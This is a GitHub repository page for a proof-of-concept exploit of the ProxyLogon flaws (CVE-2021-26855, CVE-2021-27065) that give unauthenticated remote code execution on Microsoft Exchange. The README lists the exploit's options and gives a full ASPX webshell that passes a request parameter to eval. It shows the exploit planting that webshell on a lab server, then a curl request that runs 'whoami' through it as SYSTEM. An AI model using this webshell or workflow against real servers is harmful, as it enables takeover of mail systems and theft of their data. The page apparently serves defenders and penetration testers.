Skip to content
This repository has been archived by the owner on Apr 9, 2024. It is now read-only.
/ proxylogon-exploit Public archive

Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.

License

Apache-2.0 license
45 stars 17 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

praetorian-inc/proxylogon-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

proxylogon

Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065, which allows for unauthenticated remote code execution on Microsoft Exchange as described in the following resources:

Usage

Exploitation requires knowledge of the frontend Exchange server URL (e.g. https://exchange.example.org) and an email address for a user on the system. The admin SID and backend can be leaked from the server.

$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
  [--webshell WEBSHELL] [--path PATH]
  [--backend BACKEND]
  [--proxy PROXY]

proxylogon proof-of-concept

optional arguments:
  -h, --help           show this help message and exit
  --frontend FRONTEND  external url to exchange (e.g. https://exchange.example.org)
  --email EMAIL        valid email on the target machine
  --sid SID            exchange admin sid
  --webshell WEBSHELL  webshell to upload
  --path PATH          desired path to webshell on host
  --backend BACKEND    [optional] backend host (leaked in X-CalculatedBETarget)
  --proxy PROXY        [optional] proxy traffic (e.g. http://127.0.0.1:8080)

Example

$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF

$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
  --email administrator@hafnium.local \
  --webshell webshell.aspx \
  --path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!

$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
  -d 'kxpprfgvnosz=Response.Write(
    new ActiveXObject("WScript.Shell")
      .Exec("cmd /c whoami")
      .StdOut
      .ReadAll()
);' | head -n 1
nt authority\system

About

Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

45 stars

Watchers

18 watching

Forks

17 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages